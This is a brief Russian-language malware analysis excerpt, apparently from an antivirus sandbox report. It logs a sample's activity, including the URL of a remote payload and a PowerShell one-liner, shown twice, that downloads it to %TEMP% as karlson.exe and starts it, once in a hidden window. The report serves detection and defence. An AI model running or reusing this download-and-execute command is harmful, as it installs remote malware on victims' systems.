Техническая информация
- http://flawlesshaircompany.com/system/helper/json/mang.bbk как %temp%\karlson.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://flawlesshaircompany.com/system/helper/json/mang.bbk','%TEMP%\karlson.exe');Start-Process '%TEMP%\karlson.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
- %TEMP%\1275635.cvr
- DNS ASK fl#####shaircompany.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://flawlesshaircompany.com/system/helper/json/mang.bbk','%TEMP%\karlson.exe');Start-Process '%TEMP%\karlson.exe'; (со скрытым окном)